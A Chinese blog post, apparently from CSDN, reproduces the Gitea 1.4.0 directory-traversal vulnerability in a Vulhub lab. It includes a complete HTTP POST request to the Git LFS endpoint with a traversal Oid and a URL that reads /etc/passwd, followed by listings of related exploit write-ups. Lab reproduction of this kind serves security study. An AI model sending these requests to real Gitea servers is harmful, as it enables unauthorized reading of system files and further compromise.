Vulhub靶场gitea-1.4远程代码执行漏洞复现

最新推荐文章于 2024-03-13 15:02:09 发布
最新推荐文章于 2024-03-13 15:02:09 发布
阅读量574 收藏
点赞数
文章标签: gitea
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/X_python321/article/details/131557344
版权

漏洞描述:

Gitea 是一个轻量级的 DevOps 平台软件,从gogs衍生出的一个开源项目,是一个类似于Github、Gitlab的多用户Git仓库管理平台。其1.4.0版本中有一处逻辑错误,导致未授权用户可以穿越目录,读写任意文件,最终导致执行任意命令。

漏洞影响版本:

Gitea 1.4.0

漏洞复现版本:

Gitea 1.4.0

复现过程:

1:使用vulhub中靶场启动环境

 2:浏览器访问http://ip:3000  安装界面填写用户名及密码

3:安装完成后创建仓库

4:上传任意文件后重启docker

sudo docker-compose restart

 5:浏览器访问http://ip:3000并构造数据包,注意文件路径与创建者及创建仓库一致

 

 

POST /test123/abc.git/info/lfs/objects HTTP/1.1
Host: 192.168.10.114:3000
Accept-Encoding: gzip, deflate
Accept: application/vnd.git-lfs+json
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160

{

    "Oid": "....../../../etc/passwd",
    "Size": 1000000,
    "User" : "a",
    "Password" : "a",
    "Repo" : "a",
    "Authorization" : "a"
 
}

 返回数据包状态码401表示利用成功

 浏览器访问如下地址可实现读取etc/passwd文件

http://192.168.10.114:3000/test123/abc.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth

 

3ize0f
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulhub-S2-008 远程代码执行漏洞-漏洞复现
wocao___的博客
02-22 543
S2-008 远程代码执行漏洞 影响版本: 2.1.0 - 2.3.1 测试环境搭建 docker-compose up -d 原理 S2-008 涉及多个漏洞,Cookie 拦截器错误配置可造成 OGNL 表达式执行,但是由于大多 Web 容器(如 Tomcat)对 Cookie 名称都有字符限制,一些关键字符无法使用使得这个点显得比较鸡肋。另一个比较鸡肋的点就是在 struts2 应用开启 devMode 模 式后会有多个调试接口能够直接查看对象信息或直接执行命令,正如 kxlzx 所提这种情况在生
vulhub漏洞复现十八_Gitea
weixin_44193247的博客
01-29 1241
vulhub漏洞复现练习篇
Gitea相关漏洞
最新发布
SHELLCODE_8BIT的博客
03-13 751
Go代码审计:Gitea远程命令执行漏洞链_新闻中心-网盾网络安全培训学校Vulhub靶场gitea-1.4远程代码执行漏洞复现_gitea 漏洞-CSDN博客
vulhubgitea
haoaaao的博客
05-02 1370
0x00 1.4-rce() 1、简介 其1.4.0版本中有一处逻辑错误,导致未授权用户可以穿越目录,读写任意文件,最终导致执行任意命令。 2、搭建:docker 3、复现: 利用Vulnhub复现漏洞 - Gitea 1.4.0 目录穿越导致命令执行漏洞_建瓯最坏的博客-CSDN博客 ...
Gitea 1.4.0 目录穿越导致命令执行漏洞
黑白的博客
12-23 1176
声明 好好学习,天天向上 漏洞描述 Gitea是从gogs衍生出的一个开源项目,是一个类似于GithubGitlab的多用户Git仓库管理平台。其1.4.0版本中有一处逻辑错误,导致未授权用户可以穿越目录,读写任意文件,最终导致执行任意命令。 影响范围 1.4.0 复现过程 这里使用1.4.0版本 使用vulhub /app/vulhub-master/gitea/1.4-rce 使用docker启动 docker-compose build docker-compose up -d 环境启动后,访问
Gitea 1.4 未授权远程代码执行漏洞复现
thelostworld
02-12 878
Gitea 1.4 未授权远程代码执行 一、漏洞描述 Gitea是从gogs衍生出的一个开源项目,是一个类似于GithubGitlab的多用户Git仓库管理平台。其1.4.0版本中有一处逻辑错误,导致未授权用户可以穿越目录,读写任意文件,最终导致执行任意命令。 二、影响版本 1.4.0 三、环境准备&&漏洞复现 Vulhub进行搭建 https://github.com/vulhub/vulhub/tree/master/gitea/1.4-rce安装镜像docker-..
vulhub靶场搭建安装包,包含docker-compose安装包
02-01
使用这条命令西在docker-compose太慢了而且老失败 sudo curl -L ... 使用git clone https://github.com/vulhub/vulhub.git下载vulhub-master下载太慢了 我这边包需要下载的都提供了,助力你搭建vulhub靶场
vulhub漏洞测试靶场
08-16
Vulhub是一个专门为安全研究人员和渗透测试人员设计的漏洞测试靶场平台,它提供了一系列预配置的漏洞环境,用于学习和实践网络安全技能。这个平台基于Docker容器技术,使得每个漏洞环境可以独立运行,便于管理和复现...
渗透测试上传漏洞经典靶场学习-upload-labs
07-02
渗透测试上传漏洞经典靶场学习-upload-labs
Go代码审计:Gitea远程命令执行漏洞
01-27
这是本漏洞链的导火索,其出现在GitLFS的处理逻辑中。GitLFS是Git为大文件设置的存储容器,我们可以理解为,他将真正的文件存储在git仓库外,而git仓库中只存储了这个文件的索引(一个哈希值)。这样,git objects和.git文件夹下其实是没有这个文件的,这个文件储存在git服务器上。gitea作为一个git服务器,也提供了LFS功能。在modules/lfs/server.go文件中,PostHandler是POST请求的处理函数:可见,其中间部分包含
vulhub靶场.zip
10-14
vulhub靶场
VulnHub靶场笔记 - DevGuru: 1(OSCP推荐靶场
m0_62652276的博客
12-02 1203
OSCP推荐靶场VulnHub DevGuru: 1 个人打靶笔记
利用Vulnhub复现漏洞 - Gitea 1.4.0 目录穿越导致命令执行漏洞
JiangBuLiu的博客
07-08 893
Gitea 1.4.0 目录穿越导致命令执行漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现设置浏览器的代理端口为3000Burp Vulnhub官方复现教程 https://vulhub.org/#/environments/gitea/1.4-rce/ 漏洞原理 其1.4.0版本中有一处逻辑错误,导致未授权用户可以穿越目录,读写任意文件,最终导致执行任意命令。 参考链接: htt...
gitlab漏洞系列-“外部状态检查”API泄漏关于实例的状态检查的数据
richard1230的博客
03-19 388
gitlab漏洞系列-“外部状态检查”API泄漏关于实例的状态检查的数据声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。背景这个漏洞是joaxcar小哥在2021年10月份提交的:用于从外部状态检查返回批准的API接口包含一个IDOR,该IDOR允许用户列出关于GitLab实例上所有外部状态检查的信息。该功能是一个终极版功能(注:终极版一般都是付费的),但可以在GitLab.com上试用。所以攻击的
gitea漏洞利用
weixin_34115824的博客
12-10 1381
参考文献 :https://github.com/vulhub/vulhub/tree/master/gitea/1.4-rcehttp://blog.nsfocus.net/gitea-1-4-0-rce/https://www.leavesongs.com/PENETRATION/gitea-remote...
gitea 1.4 未授权远程代码执行漏洞复现
锋刃科技的博客
01-04 1281
漏洞概要 Gitea是从gogs衍生出的一个开源项目,是一个类似于GithubGitlab的多用户Git仓库管理平台。其1.4.0版本中有一处逻辑错误,导致未授权用户可以穿越目录,读写任意文件,最终导致执行任意命令。 影响版本 1.4.0 环境搭建 Vulhub进行搭建 https://github.com/vulhub/vulhub/tree/master/gitea/1.4-rce 进入目录 cd vulhub-master/gitea/1.4-rce...
vulhub靶场cve-2019-14234
09-19
CVE-2019-14234是指vulhub靶场中的一个漏洞。这个漏洞是由于vulhub中的一个名为Fastjson的组件的安全缺陷引起的。Fastjson是一种广泛使用的Java JSON库,用于在Java应用程序中进行JSON转换。然而,Fastjson在处理特殊构造的JSON字符串时存在漏洞,攻击者可以利用这个漏洞执行任意的Java代码。 在CVE-2019-14234中,攻击者可以通过构造特定的JSON字符串并发送给受影响的应用程序来利用该漏洞。当应用程序使用Fastjson解析并处理该字符串时,恶意的Java代码将被执行。攻击者可以利用这个漏洞执行远程代码,从而导致敏感信息泄露、服务器被入侵等危害。 为了防止CVE-2019-14234的攻击,可以采取多种措施。首先,更新vulhub中的Fastjson组件到最新版本,以获得最新的安全修复。其次,在编码和处理JSON数据时,应谨慎处理不受信任的输入。可以使用输入验证和过滤来确保传入的数据是符合预期的,并且不包含恶意的代码。 此外,安全审计和漏洞扫描工具也可以用于检测和修复CVE-2019-14234漏洞。通过定期扫描应用程序,可以及时发现和修复潜在的安全问题。最后,加强网络安全意识教育,提高开发人员和用户对网络安全的认识和理解,从而进一步提高防范和应对漏洞攻击的能力。 综上所述,CVE-2019-14234是vulhub靶场中的一个Fastjson组件漏洞,可以被攻击者利用来执行任意的Java代码。修复这个漏洞的方法包括更新Fastjson组件、输入验证和过滤、安全审计和漏洞扫描以及加强网络安全意识教育。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值